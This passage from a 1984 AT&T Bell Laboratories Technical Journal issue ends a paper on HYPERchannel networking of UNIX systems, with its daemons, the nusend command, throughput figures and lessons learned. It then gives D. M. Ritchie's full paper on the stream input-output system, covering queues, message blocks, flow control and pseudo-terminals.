1. Establishing a connection to the destination system specified in the JCL file
2. Sending and receiving session layer control packets that control the file transfer
3. Reading user data files from disk and forming packets to be sent over the network (by means of the link layer).
Nscd initiates a conversation by issuing a connection request to the nsclisten process on the remote machine. This results in an nscrecv daemon process being spawned on the destination machine to handle the actual file transfer.

4.2.2.2 Nsclisten. The listen process, nsclisten, accepts calls from remote nscd processes and spawns the file transfer receive daemon, nscrecv, to receive the file from the remote.
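The spawning pattern just described — a long-lived listener that creates a per-transfer receiver process — is the standard UNIX daemon idiom, and can be sketched with fork. The names below are illustrative; `handle_transfer` stands in for the real file transfer protocol, which the article does not spell out.

```c
/* Hypothetical sketch of the nsclisten/nscrecv structure: the
 * listener forks one receiver process per incoming call, so a slow
 * transfer never blocks the acceptance of new calls. */
#include <sys/wait.h>
#include <unistd.h>
#include <assert.h>

/* Placeholder for the receiver's work (the real nscrecv completes
 * the connection, runs the transfer protocol, and delivers files). */
int handle_transfer(void)
{
    return 0;               /* 0 = transfer completed successfully */
}

/* Accept one "call": fork a receiver and report its exit status. */
int listener_accept_one(void)
{
    int status;
    pid_t pid = fork();

    if (pid == 0)
        _exit(handle_transfer());   /* child plays the nscrecv role */
    if (pid < 0 || waitpid(pid, &status, 0) != pid)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

A real listener would not wait synchronously for each child as this sketch does; it would reap completed receivers asynchronously so that several transfers can proceed in parallel.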
The listener process is used to implement an “active” network; that is, each nsclisten process sends “I am alive” messages to its peer nsclisten process on each host on the network at a low frequency.

4.2.2.3 Nscrecv. Nscrecv is the file transfer receiving daemon. It is responsible for:
1. Completing the connection request that was initiated by the file transfer daemon (nscd)
2. Implementing the file transfer protocol in cooperation with the sending process on the remote host
3. Receiving the user data files, delivering them to the user, and acknowledging their reception.

4.2.3 Link layer

The link layer performs the synchronization of host-to-host communications and provides flow control on a per-packet basis. The layer consists of two processes:
1. nscsend — reads data from the session layer and arranges for its transmission over the network
2. nscread — reads data from the network and passes data to the session layer.
This two-process structure is used to simulate asynchronous I/O, a feature that is not currently available under the UNIX system.

V. USER INTERFACE TO THE NETWORK

The nusend command provides the user interface to the network for both file transfer and remote command execution. The syntax is a carryover of a syntax originally developed to simulate file transfer between UNIX systems by means of the Remote Job Entry subsystem.

5.1 File transfer

The nusend command enables the user to transfer a file across the network. For example, the command

nusend -d mhtsa file

sends file to system mhtsa. This command places the file in a default directory on the destination system. Options to the command allow the specification of a fully qualified path name for the destination file or delivery to a different user on the remote system. Many users of the network are never aware of the network software. Rather, they invoke standard utilities that have been modified to invoke the network software.
For example, the standard means for spooling a job to the line printer

pr file | lp

may actually use the network if the local administrator has replaced the standard line printer spooler (LP) with a command to transfer files to a printer on a remote system. On many systems the mail command has been modified to forward mail to other systems on the network rather than through the slower uucp mechanism.

5.2 Remote command execution

The nusend command also provides the user with a mechanism for remote batch command execution. Any command, either a standard UNIX system command or a user’s own program, can be executed using this facility; any output from the executed command may be placed optionally in a file on the remote system or returned to the user’s local system.

VI. USAGE

The oldest and largest of the networks (see Fig. 8) has been in full production for approximately three years. The uses of the network at this point fall into the following broad categories:
1. Functional units — With the variety of processors and operating system implementations available on the network, specialization of systems among some projects has occurred. Implementations of the UNIX system running on IBM 3033AP and 3081K configurations are much faster than minicomputers, and because of their speed and large address space they have been used for such tasks as load building and source management. Other processors have been dedicated to lab support, source development, and testing (see Fig. 9).
2. Off-loading — This most often takes the form of spooling output to systems that have extensive print facilities. However, some experiments have been made in off-loading heavy CPU-bound and I/O-bound jobs, such as text processing, onto back-end machines.
3. Messaging — The UNIX system mail facility uses uucp to send mail to other systems.
Some sites have modified uucp and mail to use the local area network for local deliveries, and use the dial-up network to mail to remote systems.
4. System administration — Several computer centers have implemented network-wide password file administration, software distribution, accounting, maintenance, and general processor status monitoring by using the network. Even though the interface to the network is batch oriented, the high speed and low queuing times for jobs allow a single system administrator on one system to monitor many processors in one or more computer centers.
5. Site interconnection — Use of link adapters allows processors in different buildings to be connected by means of fiber optics, microwave, or private lines, thereby extending the domain of the local area network.

6.1 Throughput

Due to the differences in speed of the processors on the network, the throughput of network transfers varies considerably. Although the raw speed of the HYPERchannel is 50 Mb/s, a file transfer consists of more than the raw exchange of data. The CPU speed, I/O transfer rate, and disk speed of the systems involved dominate the file transfer rate; the use of UNIX system pipes and multiple processes to establish a conversation also limits the maximum bandwidth of transfers. Network traffic, general user load on the connecting systems involved in the file transfer, and contention at the adapter interfaces between minicomputers also place constraints on the transfer rate.

[Fig. 8 — An actual local area network: minicomputers (AT&T 3B20S, VAX-11, or PDP-11/70) and mainframe computers (IBM 370, 3033, 3081, etc.) attached through adapters and link adapters.]

[Fig. 9 — Functional units in a development lab.]

On lightly loaded systems, transfer speeds range from 20K bytes/s between 16-bit minicomputers up to 200K bytes/s for transfers between large mainframes.
Average transfer rates are usually lower since many of the files transferred over the network are small (less than 10K bytes) and setup time for each job dominates the transfer. In general, files are queued for only a short period of time so user satisfaction is high. Most files (less than 100K bytes) are usually queued and transmitted in a shorter time frame than the user can log onto the remote system. Table I summarizes file transfer rates between the different computer types currently supported on the network.

Table I — Nusend performance on lightly loaded UNIX systems
(all rates are in K bytes/s; † indicates a projected rate)

                            Destination Host Computer
    Sending Host Computer   AT&T 3B20S  VAX-11/780  PDP-11/70  IBM 3033  IBM 3081K
    AT&T 3B20S                  60          50          40        70†       75†
    VAX-11/780                  50          50          40        60        70
    PDP-11/70                   40          40          20        40        40
    IBM 3033                    75          60          50       120       150
    IBM 3081K                   80          70          50       150       200†

6.2 Network reliability

In the initial stages of development, the reliability of the network was marginal because of both hardware and software problems. When a new type of processor (e.g., the IBM 370) joined the network, new problems were uncovered between processors that run at different speeds and with different byte ordering. For the past three years all the networks have been in production use with high availability.

VII. LESSONS

From the process of developing the network software packages and the usage patterns of the community of users that the networks serve, several lessons were learned.

7.1 Portability

Using a common language (in this case, the C language) and a common UNIX system environment on all processors reduced both the amount of development staff needed and the debugging effort. The fact that not all systems ran the latest version of UNIX software had little impact on the software since the versions of the UNIX system were upward-compatible. However, developers had to make a conscious effort to write in a subset of C to assure that new modules would be portable.
In porting a network implementation to several radically different UNIX system implementations, it was realized that some applications, such as networking, uncover hidden assumptions about what constitutes a standard UNIX system environment. The structure of processes and their relationships to the system, each other, and devices influences the portability of the system. The flow of data from user processes through the system and the way that the operating system treats processes with these characteristics can influence both the design and portability of a network package.

7.2 Administration

Designing the right administrative tools for the network is difficult, and there is only limited experience with the uses that customers make of the network to provide good models. However, from usage to date, it appears that knowledge of the state of remote systems is valuable feedback for users. In a time-sharing environment, good network monitoring tools provide a feedback mechanism to users, who are usually unwilling to queue a file transfer to a system that is not actively accepting transfers. This also helps in reducing congestion and queuing problems. For administrators, using the network to broadcast updated source and object modules makes ordinary administrative tasks easier. Migrating users between systems is a common practice when a community of systems is being load balanced, and the network makes this trivial. The need for a common password file, standard commands and environments, and standard locations for source and object modules becomes imperative. Tracing and accounting facilities in the network software are essential for debugging and isolation of problems. The distribution and automatic installation of network software revisions were addressed with only limited success. Here it was found that certain classes of updates of the network software required shutting down large regions or the entire network.
7.3 Compatibility

Providing a package that runs on different operating systems or on different implementations of the same operating system imposes many design constraints and creates pressure to get basic protocols and functionality right the first time. Retrofitting a large network with new features that require protocol changes is something that should be avoided but planned for as part of the protocols.

7.4 Peer pressure

When different processors run a standard operating system on a network, users are quick to make comparisons between systems. A positive result is that this often generates pressure to improve each of the implementations. Sometimes, however, such comparisons cause users with large applications to migrate their work to faster machines. Comparisons between processors that are orders of magnitude different in power (VAX and 3033AP) must also factor in the cost per user of the equipment.

VIII. CONCLUSION

We can see how a standard operating system environment can simplify the development of network software that is to run across a variety of processors with different instruction sets and byte orders. The more radically different the implementation of the operating system, the more difficult the porting of a network implementation is. However, the differences can be confined to the device interface. The portability that a standard environment offers allows development to be concentrated on the reliability, functionality, and performance of the network. The savings in maintenance, training, and distribution of common source for all processors are incalculable. A surprising outcome of the work is that a network solution originally intended to provide an interim capability for prototyping more ambitious services is enjoying an extended lifetime, since it satisfies most of the users' currently perceived needs (high throughput and low queuing time).
It is believed that this has occurred because of the relatively low expectations of users concerning machine-to-machine communication. As such, the confidence gained by users in using a reliable high-speed network and the experience gained in dealing with the administrative problems of the network will be invaluable in the future.

IX. ACKNOWLEDGMENTS

Many people have contributed to the construction of the HYPERchannel networks throughout AT&T Bell Laboratories. In particular, Jeff Kinker, Tom Fisher, Joe Hall, Tom Giamaressi, Mick McKillip, Chuck Borcher, Ian Johnstone, Sherry Shulman, Kang Yueh, John Puttress, and a number of others have contributed a great deal of time and expertise to the development of the network.

REFERENCES

1. D. A. Nowitz and M. E. Lesk, "Implementation of a Dial-Up Network of UNIX Systems," Fall 1980 COMPCON, Washington, D.C., pp. 483-6.
2. C. J. Antonelli, L. S. Hamilton, P. M. Lu, J. J. Wallace, and K. Yueh, "SDS/NET — An Interactive Distributed Operating System," Fall 1980 COMPCON, Washington, D.C., pp. 487-93.
3. J. E. Allers, S. T. Hamilton, and J. A. Kukla, "The 5ESS™ Switching System: Robust and Ready for Change," Bell Lab. Rec., 61, No. 5 (May-June 1983), pp. 4-9.
4. W. A. Felton, G. L. Miller, and J. M. Milner, "The UNIX System: A UNIX System Implementation for System/370," AT&T Bell Lab. Tech. J., this issue.
5. H. Lycklama and D. L. Bayer, "UNIX Time-Sharing System: The MERT Operating System," B.S.T.J., 57, No. 6 (July-August 1978), pp. 2049-86.
6. M. E. Grezelakowski, J. H. Campbell, and M. R. Dubman, "The 3B20D Processor & DMERT Operating System: DMERT Operating System," B.S.T.J., 62, No. 1, Part 2 (January 1983), pp. 303-22.
7. T. M. Raleigh, "Introduction to Scheduling and Switching under UNIX," Spring 1976 DECUS, Atlanta, GA, pp. 867-77.
8. Network Systems Corporation, "NSC HYPERchannel System Description," Network Systems Corp., 7600 Boone Ave. N., Minneapolis, MN 55428.
AUTHORS

Thomas E. Fritz, B.S. (Chemistry), 1976, Moravian College; M.S. (Computer Science), 1979, Iowa State University; AT&T Bell Laboratories, 1979 — . Mr. Fritz has been involved with the design and development of UNIX system networking products, including work on the HYPERchannel software and the AT&T 3B20S interface to the HYPERchannel. He is currently a member of the UNIX Systems Development department.

Joseph E. Hefner, B.E.E., 1969, University of Dayton; M.S. (Bioengineering), 1976, Polytechnic Institute of Brooklyn; Sperry Rand Corporation, 1969-1976; U.S. Naval Systems Center, 1976-1982; AT&T Bell Laboratories, 1982 — . From 1969 to 1982 Mr. Hefner was involved with systems engineering and software development for submarine navigation and sonar systems, both as an employee of the Sperry Systems Management Division of Sperry Rand and as a civilian employee of the U.S. Navy at a research and development laboratory in New London, Connecticut. In 1982 he joined the technical staff at AT&T Bell Laboratories in support of UNIX system networking development. Mr. Hefner worked on the HYPERchannel software and other UNIX networking products. He is currently working in the UNIX Systems Development department.

Thomas M. Raleigh, B.S.E.E. (Electrical Engineering), 1970, The Cooper Union; M.S.E.E.C.S., 1971, University of California at Berkeley; AT&T Bell Laboratories, 1971-1983. Present affiliation: Bell Communications Research, Inc. Mr. Raleigh joined AT&T Bell Laboratories in 1971, where he initially worked on a multiprocessor missile flight simulator for the Safeguard project. In 1973, he joined the initial development group for the UNIX operating system. In 1977, he became responsible for the development of the UNIX Real-Time (RT) operating system software, a precursor to the DMERT (UNIX Real-Time Response [RTR]) operating system. Since 1979, Mr.
Raleigh has supervised groups responsible for UNIX operating system design, local area networks, real-time operating systems, and paging operating systems. In 1983, he joined Bell Communications Research as a District Manager in charge of Distributed Computing Research, where his interests are in multiple microprocessor operating systems.

AT&T Bell Laboratories Technical Journal Vol. 63, No. 8, October 1984 Printed in U.S.A.

The UNIX System: A Stream Input-Output System

By D. M. RITCHIE*

(Manuscript received October 18, 1983)

In a new version of the UNIX™ operating system, a flexible coroutine-based design replaces the traditional rigid connection between processes and terminals or networks. Processing modules may be inserted dynamically into the stream that connects a user's program to a device. Programs may also connect directly to programs, providing interprocess communication.

* AT&T Bell Laboratories. Copyright © 1984 AT&T. Photo reproduction for noncommercial use is permitted without payment of royalty provided that each reproduction is done without alteration and that the Journal reference and copyright notice are included on the first page. The title and abstract, but no other portions, of this paper may be copied or distributed royalty free by computer-based and other information-service systems without further permission. Permission to reproduce or republish any other portion of this paper must be obtained from the Editor.

I. INTRODUCTION

The part of the UNIX operating system that deals with terminals and other character devices has always been complicated. In recent versions of the system it has become even more so, for two reasons.
1. Network connections require protocols more ornate than are easily accommodated in the existing structure. A notion of "line disciplines" was only partially successful, mostly because in the traditional system only one line discipline can be active at a time.
2. The fundamental data structure of the traditional character I/O system, a queue of individual characters (the "clist"), is costly because it accepts and dispenses characters one at a time. Attempts to avoid overhead by bypassing the mechanism entirely or by introducing ad hoc routines succeeded in speeding up the code at the expense of regularity.
Patchwork solutions to specific problems were destroying the modularity of this part of the system. The time was ripe to redo the whole thing. This paper describes the new organization. The system described here runs on about 20 machines in the Information Sciences Research Division of AT&T Bell Laboratories. Although the system is being investigated in other parts of AT&T Bell Laboratories, it is not generally available.

II. OVERVIEW

This section summarizes the nomenclature, components, and mechanisms of the new I/O system.

2.1 Streams

A stream is a full-duplex connection between a user's process and a device or pseudo-device. It consists of several linearly connected processing modules, and is analogous to a shell pipeline, except that data flows in both directions. The modules in a stream communicate almost exclusively by passing messages to their neighbors. Except for some conventional variables used for flow control, modules do not require access to the storage of their neighbors. Moreover, a module provides only one entry point to each neighbor, namely a routine that accepts messages. At the end of the stream closest to the process is a set of routines that provide the interface to the rest of the system. A user's write and I/O control requests are turned into messages sent to the stream, and read requests take data from the stream and pass it to the user. At the other end of the stream is a device driver module.
Here, data arriving from the stream is sent to the device; characters and state transitions detected by the device are composed into messages and sent into the stream towards the user program. Intermediate modules process the messages in various ways. The two end modules in a stream become connected automatically when the device is opened; intermediate modules are attached dynamically by request of the user's program. Stream processing modules are symmetrical; their read and write interfaces are identical.

2.2 Queues

Each stream processing module consists of a pair of queues, one for each direction. A queue comprises not only a data queue proper, but also two routines and some status information. One routine is the put procedure, which is called by its neighbor to place messages on the data queue. The other, the service procedure, is scheduled to execute whenever there is work for it to do. The status information includes a pointer to the next queue downstream, various flags, and a pointer to additional state information required by the instantiation of the queue. Queues are allocated in such a way that the routines associated with one half of a stream module may find the queue associated with the other half. (This is used, for example, in generating echoes for terminal input.)

2.3 Message blocks

The objects passed between queues are blocks obtained from an allocator. Each contains a read pointer, a write pointer, and a limit pointer, which specify respectively the beginning of information being passed, its end, and a bound on the extent to which the write pointer may be increased. The header of a block specifies its type; the most common blocks contain data. There are also control blocks of various kinds, all with the same form as data blocks and obtained from the same allocator.
For example, there are control blocks to introduce delimiters into the data stream, to pass user I/O control requests, and to announce special conditions such as line break and carrier loss on terminal devices. Although data blocks arrive in discrete units at the processing modules, boundaries between them are semantically insignificant; standard subroutines may try to coalesce adjacent data blocks in the same queue. Control blocks, however, are never coalesced.

2.4 Scheduling

Although each queue module behaves in some ways like a separate process, it is not a real process; the system saves no state information for a queue module that is not running. In particular, queue processing routines do not block when they cannot proceed, but must explicitly return control. A queue may be enabled by mechanisms described below. When a queue becomes enabled, the system will, as soon as convenient, call its service procedure entry, which removes successive blocks from the associated data queue, processes them, and places them on the next queue by calling its put procedure. When there are no more blocks to process, or when the next queue becomes full, the service procedure returns to the system. Any special state information must be saved explicitly. Standard routines make enabling of queue modules largely automatic. For example, the routine that puts a block on a queue enables the queue service routine if the queue was empty.

[Fig. 1 — Configuration after device open.]

2.5 Flow control

Associated with each queue is a pair of numbers used for flow control. A high-water mark limits the amount of data that may be outstanding in the queue; by convention, modules do not place data on a queue above its limit. A low-water mark is used for scheduling in this way: when a queue has exceeded its high-water mark, a flag is set.
Then, when the routine that takes blocks from a data queue notices that this flag is set and that the queue has dropped below the low-water mark, the queue upstream of this one is enabled.

III. SIMPLE EXAMPLES

Figure 1 depicts a stream device that has just been opened. The top-level routines, drawn as a pair of half-open rectangles on the left, are invoked by users' read and write calls. The writer routine sends messages to the device driver shown on the right. Data arriving from the device is composed into messages sent to the top-level reader routine, which returns the data to the user process when it executes read. Figure 2 shows an ordinary terminal connected by an RS-232 line. Here a processing module (the pair of rectangles in the middle) is interposed; it performs the services necessary to make terminals usable, for example echoing, character-erase and line-kill, tab expansion as required, and translation between carriage-return and new-line. It is possible to use one of several terminal handling modules. The standard one provides services like those of the Seventh Edition system; 1 another resembles the Berkeley "new tty" driver. 2

[Fig. 2 — Configuration for normal terminal attachment.]

[Fig. 3 — Configuration for network terminals.]

The processing modules in a stream are thought of as a stack whose top (shown here on the left) is next to the user program. Thus, to install the terminal processing module after opening a terminal device, the program that makes such connections executes a "push" I/O control call naming the relevant stream and the desired processing module. Other primitives pop a module from the stack and determine the name of the topmost module.
Most of the machines using the version of the operating system described here are connected to a network based on the Datakit™ packet switch. 3 Although there is a variety of host interfaces to the network, most of ours are primitive, and require network protocols to be conducted by the host machine, rather than by a front-end processor. Therefore, when terminals are connected to a host through the network, a setup like that shown in Fig. 3 is used; the terminal processing module is stacked on the network protocol module. Again, there is a choice of protocol modules, both a current standard and an older protocol that is being phased out. A common fourth configuration (not illustrated) is used when the network is used for file transfers or other purposes for which terminal processing is not needed. It simply omits the "tty" module and uses only the protocol module. Some of our machines, on the other hand, have front-end processors programmed to conduct the standard network protocol. Here a connection for remote file transfer will resemble that of Fig. 1, because the protocol is handled outside the operating system; likewise, network terminal connections via the front end will be handled as shown in Fig. 2.

IV. MESSAGES

Most of the messages between modules contain data. The allocator that dispenses message blocks takes an argument specifying the smallest block its caller is willing to accept. The current allocator maintains an inventory of blocks 4, 16, 64, and 1024 characters long. Modules that allocate blocks choose a size by balancing space loss in block linkage overhead against unused space in the block. For example, the top-level write routine requests either 64- or 1024-character blocks, because such calls usually transmit many characters; the network input routine allocates 16-byte blocks because data arrives in packets of that size. The smallest blocks are used only to carry arguments to the control messages discussed below.
Besides data blocks, there are also several kinds of control messages. The following messages are queued along with data messages in order to ensure that their effect occurs at the appropriate time.

break — generated by a terminal device on detection of a line break signal. The standard terminal input processor turns this message into an interrupt request. It may also be sent to a terminal device driver to cause it to generate a break on the output line.

hangup — generated by a device when its remote connection drops. When the message arrives at the top level it is turned into an interrupt to the process, and it also marks the stream so that further attempts to use it return errors.

delim — a delimiter in the data. Most of the stream I/O system is prepared to provide true streams, in which record boundaries are insignificant, but there are various situations in which it is desirable to delimit the data. For example, terminal input is read a line at a time; delim is generated by the terminal input processor to demarcate lines.

delay — tells terminal drivers to generate a real-time delay on output; it allows time for slow terminals to react to characters previously sent.

ioctl — messages generated by users' ioctl system calls. The relevant parameters are gathered at the top level, and if the request is not understood there, it and its parameters are composed into a message and sent down the stream. The first module that understands the particular request acts on it and returns a positive acknowledgment. Intermediate modules that do not recognize a particular ioctl request pass it on; stream-end modules return a negative acknowledgment. The top-level routine waits for the acknowledgment, and returns any information it carries to the user.

Other control messages are asynchronous and jump over queued data and nonpriority control messages.

iocack, iocnak — acknowledge ioctl messages. The device end of a stream must respond with one of these messages; the top level will eventually time out if no response is received.

signal — messages generated by the terminal processing module that cause the top level to generate process signals such as quit and interrupt.

flush — messages used to throw away data from input and output queues after a signal or on request of the user.

stop, start — messages used by the terminal processor to halt and restart output by a device, for example to implement the traditional control-S/control-Q (X-on/X-off) flow control mechanism.

V. QUEUE MECHANISMS AND INTERFACES

Associated with each direction of a full-duplex stream module is a queue data structure with the following form (somewhat simplified for exposition):

    struct queue {
        int flag;                  /* flag bits */
        void (*putp)();            /* put procedure */
        void (*servp)();           /* service procedure */
        struct queue *next;        /* next queue downstream */
        struct block *first;       /* first data block on queue */
        struct block *last;        /* last data block on queue */
        int hiwater;               /* max characters on queue */
        int lowater;               /* wakeup point as queue drains */
        int count;                 /* characters now on queue */
        void *ptr;                 /* pointer to private storage */
    };

The flag word contains several bits used by low-level routines to control scheduling: they show whether the downstream module wishes read data, or the upstream module wishes to write, or the queue is already enabled. One bit is examined by the upstream module; it tells whether this queue is full. The first and last members point to the head and tail of a singly linked list of data and control blocks that form the queue proper; hiwater and lowater are initialized when the queue is created, and when compared against count, the current size of the queue, determine whether the queue is full and whether it has emptied sufficiently to enable a blocked writer.
The ptr member stores an untyped pointer that may be used by the queue module to keep track of the location of storage private to itself. For example, each instantiation of the terminal processing module maintains a structure containing various mode bits and special characters; it stores a pointer to this structure here. The type of ptr is artificial. It should be a union of pointers to each possible module state structure. Stream processing modules are written in one of two general styles. In the simpler kind, the queue module acts nearly as a classical coroutine. When it is instantiated, it sets its put procedure putp to a system-supplied default routine, and supplies a service procedure servp. Its upstream module disposes of blocks by calling this module's putp routine, which places the block on this module's queue (by manipulating the first and last pointers). The standard put procedure also enables the current module; a short time later the current module's service procedure servp is called by the scheduler. In pseudocode, the outline of a typical service routine is:

    service(q)
    struct queue *q;
    {
        while (q is not empty and q->next is not full) {
            get a block from q
            process message block
            call q->next->putp to dispose of new or transformed block
        }
    }

This mechanism is appropriate in cases in which messages can be processed independently of each other. For example, it is used by the terminal output module. All the scheduling details are taken care of by standard routines. More complicated modules need finer control over scheduling. A good example is terminal input. Here the device module upstream produces characters, usually one at a time, that must be gathered into a line to allow for character erase and kill processing.
Therefore the stream input module provides a put procedure to be called by the device driver or other module downstream from it; here is an outline of this routine and its accompanying service procedure:

    putproc(q, bp)
    struct queue *q;
    struct block *bp;
    {
        put bp on q
        echo characters in bp's data
        if (bp's data contains new-line or carriage return)
            enable q
    }

    service(q)
    struct queue *q;
    {
        take data from q until new-line or carriage return,
            processing erase and kill characters
        call q->next->putp to hand line to upstream queue
        call q->next->putp with DELIM message
    }

The put procedure generates the echo characters as promptly as possible; when the terminal module is attached to a device handler, they are created during the input interrupt from the device, because the put procedure is called as a subroutine of the handler. On the other hand, line-gathering and erase and kill processing, which can be lengthy, are done during the service procedure at lower priority.

VI. CONNECTION WITH THE REST OF THE SYSTEM

Although all the drivers for terminal and network devices, and all protocol handlers, were rewritten, only minor changes were required elsewhere in the system. Character devices and a character device switch, as described by Thompson, 4 are still present. A pointer in the character device switch structure, if null, causes the system to treat the device as always; this is used for raw disk and tape, for example. If not null, it points to initialization information for the stream device; when a stream device is opened, the queue structure shown in Fig. 1 is created, using this information, and a pointer to the structure naming the stream is saved (in the "inode table" 4).
Subsequently, when the user process makes read, write, ioctl, or close calls, the presence of a non-null stream pointer directs the system to use a set of stream routines to generate and receive queue messages; these are the "top-level routines" referred to previously. Only a few changes in user-level code are necessary, mostly because opening a terminal puts it in the "very raw" mode shown in Fig. 1. In order to install the terminal-processing handler, it is necessary for programs such as init to execute the appropriate ioctl call.

VII. INTERPROCESS COMMUNICATION

As previously described, the stream I/O system constitutes a flexible communication path between user processes and devices. With a small addition, it also provides a mechanism for interprocess communication. A special device, the "pseudo-terminal" or PT, connects processes. PT files come in even-odd pairs; data written on the odd member of the pair appears as input for the even member, and vice versa. The idea is not new; it appears in Tenex 5 and its successors, for example. It is analogous to pipes, and especially to named pipes. 6 PT files differ from traditional pipes in two ways: they are full-duplex, and control information passes through them as well as data. They differ from the usual pseudo-terminal files 2 by not having any of the usual terminal processing mechanisms inherently attached to them; they are pure transmitters of control and data messages. PT files are adequate for setting up a reasonably general mechanism for explicit process communication, but by themselves are not especially interesting. A special message module provides more intriguing possibilities.

[Fig. 4 — Configuration for device simulator.]

In one direction, the message processor takes control and data messages, such as those discussed above, and transforms them into data blocks
starting with a header giving the message type, and followed by the message content. In the other direction, it parses similarly structured data messages and creates the corresponding control blocks. Figure 4 shows a configuration in which a user process communicates through the terminal module, a PT file pair, and the message module with another user-level process that simulates a device driver. Because PT files are transparent, and the message module maps bijectively between device-process data and stream control messages, the device simulator may be completely faithful up to details of timing. In particular, a user's ioctl requests are sent to the device process and are handled by it, even if they are not understood by the operating system.

The usefulness of this setup is not so much to simulate new devices, but to provide ways for one program to control the environment of another. Pike7 shows how these mechanisms are used to create multiple virtual terminals on one physical terminal. In another application, intermachine connections in which a user on one computer logs into another make use of the message module. Here the ioctl requests generated by programs on the remote machine are translated by this module into data messages that can be sent over the network. The local callout program translates them back into terminal control commands.

VIII. EVALUATION

My intent in rewriting the character I/O system was to improve its structure by separating functions that had been intertwined, and by allowing independent modules to be connected dynamically across well-defined interfaces. I also wanted to make the system faster and smaller. The most difficult part of the project was the design of the interface. It was guided by these decisions:

1. It seemed to be necessary for efficiency that the objects passed between modules be references to blocks of data.
The most important consequences of this principle, and those that proved deciding, are that data need not be copied as it passes across a module interface, and that many characters can be handled during a single intermodule transmission. Another effect, undesirable but accepted, is that each module must be prepared to handle discrete chunks of data of unpredictable size. For example, a protocol that expects records containing (say) an 8-byte header must be prepared to paste together smaller data blocks and split a block containing both a header and following data. A related, although not necessarily consequent, decision was to make the code assume that the data is addressable.

2. I decided, with regret, that each processing module could not act as an independent process with its own call record. The numbers seemed against it: on large systems it is necessary to allow for as many as 1000 queues, and I saw no good way to run this many processes without consuming inordinate amounts of storage. As a result, stream server procedures are not allowed to block awaiting data, but instead must return after saving necessary status information explicitly. The contortions required in the code are seldom serious in practice, but the beauty of the scheme would increase if servers could be written as a simple read-write loop in the true coroutine style.

3. The characteristic feature of the design — the server and put procedures — was the most difficult to work out. I began with a belief that the intermodule interface should be identical in the read and write directions. Next, I observed that a pure call model (put procedure only) would not work; queueing would be necessary at some point. For example, if the write system entry called through the terminal processing module to the device driver, the driver would need to queue characters internally lest output be completely synchronous.
On the other hand, a pure queueing model (service procedure only; upstream modules always place their data in an input queue) also appeared impractical. As discussed above, a module (for example, terminal input) must often be activated at times that depend on its input data. After considerable churning of details, the model presented here emerged.

In general its performance by various measures lives up to hopes. The improvement in modularity is hard to measure, but seems real; for example, the number of included header files in stream modules drops to about one half of those required by similar routines in the base system (4.1 BSD). Certainly stream modules may be composed more freely than were the "line disciplines" of older systems.

The program text size of the version of the operating system described here is about 106 kilobytes on the VAX*; the base system was about 130 kilobytes. The reduction was achieved by rewriting the various device drivers and protocols and eliminating the Seventh Edition multiplexed files,1 most (though not all) of whose functions are subsumed by other mechanisms. On the other hand, the data space has increased. On a VAX-11/750* configured for 32 users, about 32 kilobytes are used for storage of the structures for streams, queues, and blocks. The traditional character lists seem to require less; similar systems from Berkeley and AT&T use between 14 and 19 kilobytes. The tradeoff of program for data seems desirable.

Proper time comparisons have not been made, because of the difficulty of finding a comparable configuration. On a VAX-11/750, printing a large file on a directly connected terminal consumes 346 microseconds per character using the system described here; this is about 10 percent slower than the base system.

* Trademark of Digital Equipment Corporation.
On the other hand, that system's per-character interrupt routine is coded in assembly language, and the rest of its terminal handler is replete with nonportable interpolated assembly code; the current system is written completely in C. Printing the same file on a terminal connected through a primitive network interface requires 136 microseconds per character, half as much as the older network routines. Pike7 observes that among the three implementations of Blit connection software, the one based on the stream system is the only one that can download programs at anything approaching line speed through a 19.2 kb/s connection. In general I conclude that the new organization never slows comparable tasks much, and that considerable speed improvements are sometimes possible.

Although the new organization performs well, it has several peculiarities and limitations. Some of them seem inherent, some are fixable, and some are the subject of current work.

I/O control calls turn into messages that require answers before a result can be returned to the user. Sometimes the message ultimately goes to another user-level process that may reply tardily or never. The stream is write-locked until the reply returns, in order to eliminate the need to determine which process gets which reply. A timeout breaks the lock, so there is an unjustified error return if a reply is late, and a long lockup period if one is lost. The problem can be ameliorated by working harder on it, but it typifies the difficulties that turn up when direct calls are replaced by message-passing schemes.

Several oddities appear because time spent in server routines cannot be assigned to any particular user or process. It is impossible, for example, for devices to support privileged ioctl calls, because the device has no idea who generated the message.
Accounting and scheduling become less accurate; a short census of several systems showed that between 4 and 8 percent of non-idle CPU time was being spent in server routines. Finally, the anonymity of server processing most certainly makes it more difficult to measure the performance of the new I/O system.

In its current form the stream I/O system is purely data-driven. That is, data is presented by a user's write call, and passes through to the device; conversely, data appears unbidden from a device and passes to the top level, where it is picked up by read calls. Wherever possible, flow control throttles down fast generators of data, but nowhere except at the consumer end of a stream is there knowledge of precisely how much data is desired. Consider a command to execute a possibly interactive program on another machine connected by a stream. The simplest such command sets up the connection and invokes the remote program, and then copies characters from its own standard input to the stream, and from the stream to its standard output. The scheme is adequate in practice, but breaks down when the user types more than the remote program expects. For example, if the remote program reads no input at all, any typed-ahead characters are sent to the remote system and lost. This demonstrates a problem, but I know of no solution inside the stream I/O mechanism itself; other ideas will have to be applied.

Streams are linear connections; by themselves, they support no notion of multiplexing, fan-in, or fan-out. Except at the ends of a stream, each invocation of a module has a unique "next" and "previous" module.
Two locally important applications of streams testify to the importance of multiplexing: Blit terminal connections,7 where the multiplexing is done well, though at some performance cost, by a user program, and remote execution of commands over a network, where it is desired, but not now easy, to separate the standard output from error output. It seems likely that a general multiplexing mechanism could help in both cases, but again, I do not yet know how to design it.

Although the current design provides elegant means for controlling the semantics of communication channels already opened, it lacks general ways of establishing channels between processes. The PT files described above are just fine for Blit layers, and work adequately for handling a few administrator-controlled client-server relationships. (Yes, we have multimachine mazewar.) Nevertheless, better naming mechanisms are called for.

In spite of these limitations, the stream I/O system works well. Its aim was to improve design rather than to add features, in the belief that with proper design, the features come cheaply. This approach is arduous, but continues to succeed.

REFERENCES

1. UNIX Programmer's Manual, Seventh Edition, Bell Laboratories, Murray Hill, NJ (January 1979).
2. UNIX Programmer's Manual, Virtual VAX-11 Version, University of California, Berkeley (June 1981).
3. A. G. Fraser, "Datakit — A Modular Network for Synchronous and Asynchronous Traffic," Proc. Int. Conf. on Commun., Boston, MA (June 1979).
4. K. Thompson, "UNIX Time-Sharing System: UNIX Implementation," B.S.T.J. 57, No. 6 (July-August 1978), pp. 26-41.
5. D. G. Bobrow, J. D. Burchfiel, D. L. Murphy, and R. S. Tomlinson, "TENEX, a Paged Time Sharing System for the PDP-10," Comm. Assoc. Comp. Mach. 15, No. 3 (March 1972), pp. 135-143.
